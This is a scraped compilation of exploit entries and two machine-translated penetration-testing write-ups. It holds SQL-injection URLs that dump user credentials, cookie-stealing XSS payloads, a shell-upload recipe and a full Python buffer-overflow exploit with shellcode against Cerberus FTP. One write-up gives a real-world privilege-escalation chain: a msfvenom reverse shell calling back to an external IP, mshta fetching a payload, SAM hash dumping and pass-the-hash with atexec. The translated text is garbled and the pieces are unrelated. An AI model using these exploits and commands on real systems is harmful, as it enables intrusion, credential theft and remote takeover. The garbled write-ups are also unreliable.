HireHackking

source: https://www.securityfocus.com/bid/49419/info The Mambo CMS AHS Shop component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/[PATH]/index.php?option=com_ahsshop&flokkur=-294 union select 0,username,password,3,4,5,6,7,8,9 from mos_users

source: https://www.securityfocus.com/bid/49422/info The Mambo CMS N-Frettir component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/[PATH]/index.php?option=com_n-frettir&do=view&Itemid=81&id=-54 union select 0,username,2,password,4,5,6,7,8,9,10 from mos_users

source: https://www.securityfocus.com/bid/49421/info KaiBB is prone to multiple SQL-injection vulnerabilities and a arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data. Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. KaiBB 2.0.1 is vulnerable; other versions may also be affected. <+> 1 / * Multiple SQL Inj3cti0n : http://127.0.0.1/kaibb/?s=viewtopic&t=' http://127.0.0.1/kaibb/?s=viewtopic&t=1' http://[target]/[path]/?s=viewtopic&t=[SQLi] ------------------------------------------------ http://127.0.0.1/kaibb/?s=viewforum&f=' http://127.0.0.1/kaibb/?s=viewforum&f=1' http://[target]/[path]/?s=viewforum&f=[SQLi] ------------------------------------------------ http://127.0.0.1/kaibb/?s=profile&user=' http://127.0.0.1/kaibb/?s=profile&user=2' http://[target]/[path]/?s=profile&user=[SQLi] ------------------------------------------------ http://127.0.0.1/kaibb/?s=search&mode=search&term=&page=' http://127.0.0.1/kaibb/?s=search&mode=search&term=&page=1' http://[target]/[path]/?s=search&mode=search&term=&page=1'[SQLi] ------------------------------------------------ <+> 2 / * File|Sh3lL Upload : http://127.0.0.1/kaibb/?s=ucp&mode=avatar + After register go t0 : http://[target]/[path]/?s=ucp&mode=avatar + Upload Sh3ll.php.gif .... - Find him on : http://127.0.0.1/kaibb/img/avatars/{UserID}.gif fr0m eXample : {UserID} = 2 : + http://127.0.0.1/kaibb/img/avatars/2.gif

0x00概要 ターゲットサイトはhttp://www.example.comです。公式ウェブサイトはAPIの使用文書を提供していますが、テスト後に脆弱性は見つかりませんでした。ディレクトリ、ポートスキャンなどで利用可能なポイントは見つかりませんでした。後で、公式ウェブサイトがクライアントのダウンロードを提供したことがわかりました。 0x01情報収集 最初にクライアントのパッケージをつかみました。 FiddlerとBurpsuiteを使用してキャッチできませんでした。私はそれがHTTPプロトコルではないと疑った。 Wiresharkを使用して、実際にHTTPプロトコルを使用していることを確認しましたが、データパケットは簡単に再生できませんでした。最後に、WSEXPlorerを使用して、指定されたプロセスのパケットをキャプチャし、通信データを正常にキャプチャしました。キャプチャされたデータは次のとおり、緑色はリクエストパケットであり、赤いものは応答パケットでした。 データパケットは2つの部分に分割されます。1つはリクエストラインとリクエストヘッダーです。 1つはリクエスト本体です。 それを一緒にスプライシングすることは、データパケットをリプレイするために強盗に配置できます 0x03テストプロセス リクエストパケットが暗号化されてから送信され、返された応答パケットも暗号化されていることがわかります。ただし、暗号化と復号化は常にクライアントで実行されるため、クライアントを分析することから始めることができます。 Exeinfo PEを使用してシェルを確認すると、NETフレームワークC＃によって開発されたプログラムが使用されていることがわかります。 DNSPYを使用して、NETプログラムにリバースエンジニアリングツールを使用して、クライアントの暗号化と復号化を分析できます。開いた後、クラスとメソッドの命名はすべて不規則な数値文字であり、コードが難読化されていることがわかりました。 難読化されたコードは読み取り分析を使用せず、DE4DOTを使用して防1障害を試みることができ、多くの難解性暗号化ツールをサポートしてソースコードを難読化できます。 de4dot-x64.exe origin.exe 耐性のあるプログラムOrigin-Cleaned.exe を入手できます 溶け防止プログラムをDNSPYにドラッグして表示すると、復元されて読みやすくなります。 その通信はHTTPプロトコルを使用しているため、httphelperという名前のクラスがあることがわかりました。分析のフォローアップ。コードには、図に示すように、データを暗号化してPOSTリクエストを開始する方法であると疑われるPOST機能は表示されません。 M.Encrypt（）は、要求されたパラメーターを暗号化するために呼び出され、メソッドをフォローアップし、MMクラスの下でキー暗号化関数がtest05関数である必要があることがわかりました。 ブレークポイントを設定して、プログラムが暗号化と送信用にこの関数を呼び出すかどうかを確認します。プレーンテキストと暗号文にブレークポイントを設定します。 F5はプログラムを開始し、アカウントパスワードTest123456を入力し、ログイン プログラムはブレークポイントで停止し、プレーンテキストには、Test123456とMD5が入力したアカウントによって暗号化されたパスワードが含まれていました。 暗号化されたコンテンツをリリースして取得すると、ここの暗号化関数が呼び出されていることを確認できます。 後に、応答パッケージの復号化がMMクラスのTest06関数を呼び出し、リクエストパッケージの暗号化関数Test05と応答パッケージ復号化関数Test06がDLLの対応する関数を呼び出すことが後に確認されました。 ここでの暗号化と復号化は、2つのセットのメソッドを呼び出します。これを使用して、リクエストパケットの暗号化されたデータを復号化することはできません。テストを容易にし、迅速に暗号化および復号化するために、暗号化と復号化関数が差し引かれ、DLLの関数が独立したプログラムにコンパイルするために呼び出されるため、アルゴリズムを分析する必要はありません。 ここでは、SharpDeveloped Compiledを使用しています。VisualStudioを使用すると、常にエラーが報告されます. public static string decryptresponse（string cipher）{ byte [] bytes=encoding.utf8.getBytes（cipher）; byte [] array=new byte [bytes.length + 128]; int count=program.test06（ref bytes [0]、ref array [0]）; string text=encoding.utf8.getString（array、0、count）; テキストを返します。 } public static string encryptrequest（string plain）{ byte [] bytes=encoding.utf8.getBytes（plain）; int num=bytes.length * 2 + 128; if（num32）{ num=64; } byte [] array=new byte [num]; int num2=0; num2=test05（ref bytes [0]、ref array [0]）; 文字列result=encoding.utf8.getString（array、0、num2）; 返品結果; } 暗号化 復号化 次に、PythonのFlask Frameworkを使用して、プロキシ転送プログラムをローカルに作成して、Burpsuiteでのリプレイテストを促進します。 プロセスは次のとおりです。 Plantextデータパケットをローカルにプロキシエージェントに送信します。リクエストパケットを受信します。発信者はリクエストパケットを暗号化します。暗号化されたデータパケットは、サーバー発信者に転送されます。サーバーによって返されたコンテンツは復号化され、プレーンテキストデータに戻り、Flask Import Request、Flaskからローカルに戻ります urllib.parseインポート見積もりから リクエストをインポートします OSをインポートします ヘッダー={ 'user-agent':' mozilla '、 'content-type':'アプリケーション/x-www-form-urlencoded '、 'Accept-Encoding':' gzip、deflate '、 } app=flask（ 'example'） @app.route（ '/example'、method=['post']） def proxy（）: form=request.form request_plain='' フォーム:のキーの場合 request_plain +='{}={}'。フォーマット（key、form [key]） Response_Plain=test（request_plain） RESONSE_PLAINを返します def encrypt（filename）: encrypt_cmd='crypto.exe -encrypt {}'。フォーマット（filename）＃暗号化されるコンテンツはファイルから読み取ります result=os.popen（encrypt_cmd）＃exe exeを実行します request_cipher=quote（result.read（））#encryptedコンテンツURLエンコード後、 +サインを％2Bサーバーに変換して認識します request_cipherを返します def decrypt（filename）: decrypt_cmd='crypto.exe -decrypt {}'。フォーマット（filename）＃decryptedのコンテンツはファイルから読み取ります result=os.popen（decrypt_cmd）＃exe exeを実行します response_plain=result.read（）＃復号化されたコンテンツを読み取ります RESONSE_PLAINを返します def test（request_plain）: url='http://example.com/api/' plain_txt='plain.txt' f1:としてopen（plain_txt、 'w'） f1.writeLines（request_plain）＃plaintextをplain.txtに保存します request_cipher=encrypt（plain_txt）＃encrypt plantext response=requests.post（url=url、data=request_cipher、headers=headers）#send request cipher_txt='cipher.txt' f2:として開いている（cipher_txt、 'w'） f2.writeLines（response.text）#storage ciphertext in cipher.txt Response_plain=decrypt（cipher_txt）＃decrypt ciphertext RESONSE_PLAINを返します __name__=='__main __' :の場合 app.run（host='0.0.0.0'、port=9999、debug=true） ここでリクエストされるインターフェイスは毎回同じであり、唯一の変更はリクエスト本体のパラメーターです。 CodeServiceにはすべてのインターフェイスのすべてのプレーンテキストがあり、すべてが抽出されます。 Burpsuite〜で通常テストできます 最後に、SQL注入はインターフェイスで正常に発見されました。 0x04要約 1。指定されたプロセスのパッケージをWSEXPlorerを介してつかみ、HTTPプロトコルのデータパケットが暗号化されていることを発見します。アンチオブスケートを試すために、多くの難解な暗号化ツールDE4DOT-X64.EXE ORIGIN.EXE5によって難読化されたソースコードをサポートします。 DNSPYを使用してプログラムを再コンパイルし、プログラムの暗号化、ブレークポイントの関数メソッドを表示し、F5を押して実行します。プログラムはブレークポイントで停止し、プレーンテキストには、私が入力したアカウントTest123456とMD5によって暗号化されたパスワードが含まれています。 6.プログラムの暗号化と復号化関数セグメントを見つけ、メインコードを切り取り、Python 7に記述します。次に、PythonのFlask Frameworkを使用して、プロキシ転送プログラムをローカルに書き込み、Burpsuiteでのリプレイテストを促進します。プロセスは次のとおりです。Plantextデータパケットをプロキシエージェントにローカルに送信します。リクエストパケットが受信されます。発信者はリクエストパケットを暗号化します。暗号化されたデータパケットは、サーバー発信者に転送されます。サーバーによって返されるコンテンツは復号化され、プレーンテキストデータにローカルに返されます。 元の接続：https://Blog.csdn.net/qq_32727277/article/details/102783316

source: https://www.securityfocus.com/bid/49444/info Cerberus FTP Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition. Cerberus FTP Server 4.0.9.8 is vulnerable; other versions may also be affected. NOTE: The vendor refutes this issue stating the issue can not be replicated as described. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com # Home : Hassi.Messaoud (30008) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com # Facebook : http://facebook.com/KedAns # platform : windows # Impact : Remote Buffer Overflow ( in REST command) # Tested on : Windows XP SP3 (en) ## ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG | # | ------------------------------------------------- < | ### #=====[ Exploit Code ]======> #!/usr/bin/python # Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit # Provided by : KedAns-Dz * Inj3ct0r Team import errno from os import strerror from socket import * import sys from time import sleep from struct import pack if len(sys.argv) != 3: print "[*]Usage: python %s <ip> <port>" % sys.argv[0] print "[*]Exemple: python %s 192.168.1.2 21" % sys.argv[0] sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) # windows/exec | cmd=calc.exe | x86/alpha_mixed (http://metasploit.com) shellcode = ("\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" "\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" "\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" "\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" "\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" "\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x4b" "\x58\x4e\x69\x43\x30\x43\x30\x43\x30\x43\x50\x4f\x79\x4b" "\x55\x45\x61\x4e\x32\x43\x54\x4c\x4b\x42\x72\x50\x30\x4c" "\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4c\x4b\x43" "\x42\x45\x78\x46\x6f\x4d\x67\x51\x5a\x51\x36\x50\x31\x49" "\x6f\x50\x31\x4b\x70\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x47" "\x72\x46\x4c\x51\x30\x49\x51\x4a\x6f\x46\x6d\x47\x71\x4a" "\x67\x4a\x42\x4a\x50\x46\x32\x51\x47\x4c\x4b\x43\x62\x44" "\x50\x4e\x6b\x42\x62\x45\x6c\x47\x71\x4e\x30\x4c\x4b\x47" "\x30\x50\x78\x4e\x65\x49\x50\x50\x74\x51\x5a\x46\x61\x4e" "\x30\x50\x50\x4c\x4b\x51\x58\x45\x48\x4e\x6b\x43\x68\x45" "\x70\x47\x71\x4b\x63\x4a\x43\x45\x6c\x47\x39\x4c\x4b\x47" "\x44\x4c\x4b\x46\x61\x48\x56\x50\x31\x49\x6f\x46\x51\x4f" "\x30\x4e\x4c\x4b\x71\x4a\x6f\x44\x4d\x47\x71\x4a\x67\x44" "\x78\x49\x70\x44\x35\x48\x74\x45\x53\x51\x6d\x4a\x58\x45" "\x6b\x51\x6d\x44\x64\x44\x35\x48\x62\x51\x48\x4e\x6b\x51" "\x48\x47\x54\x43\x31\x4b\x63\x43\x56\x4e\x6b\x46\x6c\x42" "\x6b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4a\x73\x4e\x6b\x43" "\x34\x4e\x6b\x47\x71\x48\x50\x4c\x49\x51\x54\x51\x34\x45" "\x74\x43\x6b\x43\x6b\x50\x61\x46\x39\x51\x4a\x42\x71\x4b" "\x4f\x4d\x30\x50\x58\x51\x4f\x50\x5a\x4e\x6b\x46\x72\x4a" "\x4b\x4b\x36\x43\x6d\x51\x7a\x46\x61\x4e\x6d\x4f\x75\x4d" "\x69\x43\x30\x47\x70\x45\x50\x50\x50\x42\x48\x44\x71\x4c" "\x4b\x50\x6f\x4b\x37\x4b\x4f\x4a\x75\x4f\x4b\x4a\x50\x4d" "\x65\x4e\x42\x42\x76\x50\x68\x4e\x46\x4e\x75\x4f\x4d\x4d" "\x4d\x4b\x4f\x4e\x35\x47\x4c\x44\x46\x51\x6c\x44\x4a\x4d" "\x50\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x47\x37\x45" "\x43\x51\x62\x50\x6f\x42\x4a\x47\x70\x50\x53\x49\x6f\x49" "\x45\x50\x63\x51\x71\x42\x4c\x42\x43\x46\x4e\x50\x65\x51" "\x68\x43\x55\x45\x50\x41\x41") buf = "\x41" * 244 buf += pack('<L',0x7C874413) # jmp esp - from (kernel32.dll) buf += "\x90" * 50 buf += shellcode print "[+]Connecting with server..." sleep(1) try: s = socket(AF_INET,SOCK_STREAM) s.connect((ip,port)) s.recv(1024) s.send("USER test\r\n") s.recv(1024) s.send("PASS test\r\n") s.recv(1024) s.send("REST "+buf+"\r\n") s.close() s = socket(AF_INET,SOCK_STREAM) s.connect((ip,port))# Connected again to Crash and BOF sleep(1) s.close()# Close connection and Crash!!! print "[+]Exploit sent with sucess" except: print "[-]Error in connection with server: "+ip #=====[ The End ]=======| #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3 # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_ # anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org) # www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs .. #=================================================

source: https://www.securityfocus.com/bid/49442/info ACal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. ACal 2.2.6 is vulnerable; other versions may also be affected. http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script>

source: https://www.securityfocus.com/bid/49424/info The Mambo CMS N-Myndir component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/[PATH]/index.php?option=com_n-myndir&flokkur=-16 union select username from mos_users

0x01はじめに 友人がウェブサイトを送って、パワーエレベーションをチェックするのに役立ちました。サーバーは、Guardian + Turfur + Security Dogなどのセキュリティソフトウェアをインストールしました。本当に怖いです。彼はまた、一般的に使用されているパワーエレベーションExpをたくさん試しましたが、すべて失敗しました。たぶんそれは彼が経験を殺す能力に欠けていたからです。もちろん、彼がこれらの抜け穴を修正したのかもしれません。彼は時間をかけて彼のためにそれを読んで、この記録記事を書きました。許可を取得した後、私はそれを中国の包丁で接続しましたが、それは傍受されているように見えました。プロンプト：サーバーは、無効または認識されていない応答を返します。私はこの状況に何度も遭遇しました。ゴジラに変更して、正常に接続してください。 0x02サーバーの基本情報を収集 私の友人はテスト後にいくつかの情報を提供しましたが、私はまだ自分で読むことに慣れています。自分で読んだ後にのみ、どの環境、WAF/AV、およびサードパーティソフトウェアがインストールされているか、どのポートが開かれているか、いくつのパッチが配置されているかなどを知ることができます。ターゲットシステム：Windows 2008 R2（6.1ビルド7601、サービスパック1）。現在の権限：IIS AppPool \ ****。comサポートスクリプト：ASP、ASPX、PHP、およびシステムコマンドを直接実行できます。オープンポート：21（FTP）、80（HTTP）、135（RPC）、443（HTTPS）、445（SMB）、801（HTTP）、3306（MySQL）、2121（G6FTP）、8021（G6FTP）、6588（HWS）、58895（ターサービス）、5895 G6ftptray.exe、hwshostpanel.exe、mysqld.exe、php-cgi.exe、safedogupdatecenter.exe、safedogguardcenter.exe、safedogguardcenter.exe、safedogguardhelperperper.exe safedogguardhelper.exe、hipstray.exe、hipsdaemon.exe、usysdiag.exe サーバーの実行：ターコイズ、ガーディアンホストマスター、サーバーセキュリティドッグ、MySQLデータベース、G6FTP。 Guardian Host Master、MySQL、およびG6FTPを増やすことができます。ただし、権限を提起する過程で、可能な限り管理者によって発見されないように、ターコイズとサーバーのセキュリティ犬の検出と傍受に注意を払う必要があります。 0x03 MSFセッションを取得するためにTinwoodをバイパス 個人的には、MSFの下で電力を高めることに慣れています。まず、セッションを取得する方法が見つかります。 TurfurはPowerShellの実行を傍受し、デフォルトでHTA_ServerのHTAファイルを殺すため、これらの2つの方法はここでは機能しません。ここでは、MSHTAホワイトリストを使用してMSFセッションを取得します。最初に、次のコマンドを実行してシェルコードを生成してリスニングを実行し、exp.htaファイルのシェルコードをMSFシェルコードに置き換えます。 [root@p1600778655〜] ＃msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp lhost=155。 base64 -w 0msf6 exploit（multi/handler）set payload windows/meterpreter/reverse_tcpmsf6 exploit（multi/handler）set lport 443msf6 exploit（multi/handler）exploit 次に、Pythonを使用してVPSでリモートコール用の一時Webを有効にし、ASPX Malaysiaコマンド実行機能に移動して、MSHTA.EXEを使用してEXP.HTAファイルを実行して、オンラインになります。 python -m SimpleHttpserver 88888python3 -m http.server 8888 0x04 SAMレジストリキーエクスポートハッシュ 私の友人は、初期段階で多くの経験をテストしました。さらに、ガーディアンホストマスターはより高いバージョンであり、MySQLも降格されているため、これらの従来の方法をテストしなくなります。 G6FTPを試すことはできますが、別の型破りな方法を使用しています。この原則は、《西部数码云主机失败提权案例》条に記載されている方法を直接使用することも非常に簡単です。 SAMレジストリキーにユーザーまたは全員の読み取り許可がある場合、MSFの下のHashdumpモジュールを使用してハッシュをエクスポートできます。 MeterPreter getUidMeterPreter Load PowerShellMeterPreter PowerShell_Shellps Get -Acl -Path HKLM: \ sam \ sam | format-listmeterpreter run post/windows/graching/hashdump 0x05 atexecはシステム権限を強化します ホストハッシュはSAMレジストリキー許可の問題を使用してエクスポートされていますが、次の問題に直面しています。この時点で、ハッシュ配信をサポートするリモートコマンド実行ツールを使用してシステムコマンドを実行することを試みることができます。ここでは、Impacketスイートのリモートコマンド実行関数でATEXECを使用してデモを行います。ハッシュの配信と利用方法をサポートする他のツールは次のとおりです。ポート135：wmicmd/sharpwmi/wmihacker/sharp-wmiexec; Impacket：Psexec（445）/Wmiexec（135）/smbexec（445）/atexec（445）;利用方法：ローカルローカル実行、Socks4/5プロキシ、Metasploit仮想ルーティングテーブル。ここでは、最初に現在のMSFセッションを仮想ルートに追加し、Socks_Proxyモジュールを使用してSocks5プロキシを開き、proxychains.conf Configurationファイルを変更し、最後にプロキシチャインプロキシツールを使用してAtexecを実行します。 MeterPreter run get_local_subnetsmeterpreter run autoroute -s 59 MSF6 Auxiliary（Server/Socks_Proxy）SET USERNAME TESTMSF6 AUXILYARY（SERVER/SOCKS_PROXY）セットパスワード123456MSF6 Auxiliary（Server/Socks_Proxy）Run KALIのプロキシチャイン構成は、デフォルトによると、デフォルトによると、プロキシチャインによるものです。コンパイルされ、それ自体でインストールされる構成は、ルートディレクトリ/src/proxychains.confにあります。私はそれを変更する方法を説明しません。構成ファイルには例があります。 [root@P1600778655 SRC]＃VI /SRV/PROXYCHAINS/SRC/PROXYCHAINS.CONF Atexecを実行するためにプロキシプロキシツールを使用する場合、次のエラーが発生する可能性があり、コマンドの実行はECHOEを使用できます。実行は成功しました。 dnslogがデータを受け取った場合、それは成功することを意味します。 [root@P1600778655〜] administrator@59.*****.230 'cmd /c ping 9o ** mf.dnslog.cn' コマンドの実行が成功したことを確認した後、別のコマンド端末と有効なMSFリスニングを開始し、プロキシチャインプロキシツールを使用してAtexecを実行します。ここでは、以前に使用されたExp.htaファイルを実行した後、ターゲットホストシステムを取得できます。 MeterPreter Run get_local_subnetsmeterpreter run autoroute -s 59。 Auxiliary（Server/Socks_Proxy）実行 Pluthfall Record-1：現在のMSFセッションが仮想ルートに追加されていない場合、Socks5プロキシがオンになっていても、プロキシンプロキシツールを使用してAtexecを実行することはできません。 MSFのソックスモジュールがVPSにソックスプロキシを開くため、次のエラーメッセージが報告されます。仮想ルートを追加する前に、ターゲットポート445と通信することはできません。 Socks Proxyがターゲットホストにオンになっているため、ターゲットによって有効になっている靴下をローカルに接続してターゲットポート445。落下記録2：ソックスプロキシトラフィックが開かれない限り、プロキシチャインプロキシツールを使用すると、Atexecを実行できます。 whoami1.txtコマンドが実行されます。もちろん、これはこの環境の単なる個々のケースかもしれませんが、Ping Dnslogコマンドによって実行が成功したかどうかを判断できます。 0x06要約 1。草を介して接続することに成功します。SystemInfoコマンドを実行して、ディレクトリWindows2008R2 SP13を発見します。 IIS許可を発見するためにhoamiコマンドを実行し、Netstat -Anoを実行し、21、80、445、801、3306、およびその他のポートを開いている4。コマンドタスクリスト/SVCを実行することにより、ガーディアン、ターフ、セキュリティドッグ保護ソフトウェアなどがあることがわかりました。次のコマンドを実行して、シェルコードを生成してリスニングmsfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp lhost=155.124.145.16 lport=443 -f raw /tmp/shellcode.bin6.view shellcode.bin shellcode.bin cat/tmp/shelcode.bintmp/shelcode.bintmp/shelcodecode.bins base64 -w 0msf6セットペイロードウィンドウ/メータープレター/リバース_tcpmsf6セットLHOST 155.124.145.16MSF6 SET LPORT 443MSF6 Exploit 7.新しいexp.htaをカスタマイズして作成し、Exp.htaファイルのシェルコードをMSFのシェルコードに置き換えます。スクリプト言語='vbscript'dim binary:binary=' rundll32.exe'dim code:code='shecode.binコンテンツBase64'8。次に、VPSでPythonを使用して、Python -M SimpleHttpserver 88888Python3 -M HTTP.Server 88889へのリモートコール用の一時的なWebを有効にします。APXマレーシアを草でアップロードし、CMDPath:C: \ Windows \ System32 \ CMD.Exexeargument:/http://155.124.145.16/exp.hta10。 SAMレジストリキーにユーザーまたは全員の読み取り許可がある場合、MSFの下のHashdumpモジュールを使用してハッシュをエクスポートできます。 MeterPreter getUidMeterPreter Load PowerShellMeterPreter PowerShell_Shellps Get -Acl -Path HKLM: \ sam \ sam | format-listmeterpreter run post/windows/hashdump11。ホストハッシュは、SAMレジストリキー許可の問題を使用してエクスポートされていますが、復号化することはできません。ここで、最初に現在のMSFセッションを仮想ルートメータープレターに追加します。 Socks_Proxyモジュールを使用して、Socks5プロキシを有効にします。 MSF6 Auxiliary（Server/Socks_Proxy）SET USERNAME TESTMSF6 AUXILYARY（SERVER/SOCKS_PROXY）SETパスワード123456MSF6 Auxiliary（Server/Socks_Proxy）Run14.Kaliのプロキシチャイン構成は/extc/proxyains.conf by compuraties by defider ed ed compoxyains.confuration.それ自体は、ルートディレクトリの/src/proxychains.confにあります。私はそれを変更する方法を説明しません。構成ファイルには例があります。 [root@p1600778655 src]# vi /srv/proxychains/src/proxychains.conf15.利用proxychains代理工具执行atexec时可能会出现以下报错，且没有命令执行回显，但我们可以先用Ping 9o**mf.dnslog.cn命令看下是否执行成功，如果DNSLog收到数据则说明成功proxychains4 -f /srv/proxychains/src/proxychains.conf python3 /srv/impacket/examples/atexec.py -hashes :ebdccc154cadcda7f5ef0a2149274f3c administrator@59.***.***.230 'cmd /c ping 9o**mf.dnslog.cn'16.另起一个命令终端开启MSF监听，然后再用proxychains代理工具执行atexec，这里再次执行前边用到的exp.hta文件后即可得到目标主机SYSTEMmsf6 auxiliary(server/socks_proxy) sessions -i 1meterpreter run get_local_subnetsmeterpreter run autoroute -s 59.***.***.0/255.255.255.0meterpreter bgmsf6 auxiliary(server/socks_proxy) set username testmsf6 auxiliary(server/socks_proxy) set password 123456msf6 auxiliary(server/socks_proxy) run原文链接：https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247488543idx=1sn=0e300f65f1425e035fcd8cdb9f3dd38cchksm=cfa6b00cf8d1391aeaae7cb2e7839f041e4c1264df495cbc5d91963820ca617872c95758e063scene=178cur_album_id=1553386251775492098#rd

source: https://www.securityfocus.com/bid/49457/info YABSoft Advanced Image Hosting Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Advanced Image Hosting Script 2.3 is vulnerable; other versions may also be affected. http://www.example.com/demo/aihspro/report.php?img_id=[XSS]

# Exploit Title: Duplicator 0.5.8 Privilege Escalation # Date: 21-11-2014 # Software Link: https://wordpress.org/plugins/duplicator/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description Every registered user can create and download backup files. File: duplicator\duplicator.php add_action('wp_ajax_duplicator_package_scan', 'duplicator_package_scan'); add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build'); add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete'); add_action('wp_ajax_duplicator_package_report', 'duplicator_package_report'); http://security.szurek.pl/duplicator-058-privilege-escalation.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register) then start scan: http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan After that you can build backup: http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build This function will return json with backup name inside File key. You can download backup using: http://wordpress-url/wp-snapshots/%file_name_from_json% 3. Solution: Update to version 0.5.10

source: https://www.securityfocus.com/bid/49468/info Kisanji is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/default.aspx?gr=[xss]

source: https://www.securityfocus.com/bid/49465/info Apple QuickTime is prone to a buffer-overflow vulnerability because of a failure to properly bounds-check user-supplied data. Successful exploits will allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions. QuickTime 7.6.9 is vulnerable; other versions may also be affected. <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:0F5B08E7-94EE-470B-A184-5CD4A7DF35A3' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\QuickTime\QuickTimePlayer.dll" prototype = "Sub OpenURL ( ByVal url As String )" memberName = "OpenURL"progid = "QuickTimePlayerLib.QuickTimePlayer" argCount = 1 arg1="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n" target.OpenURL arg1 </script> </job> </package>

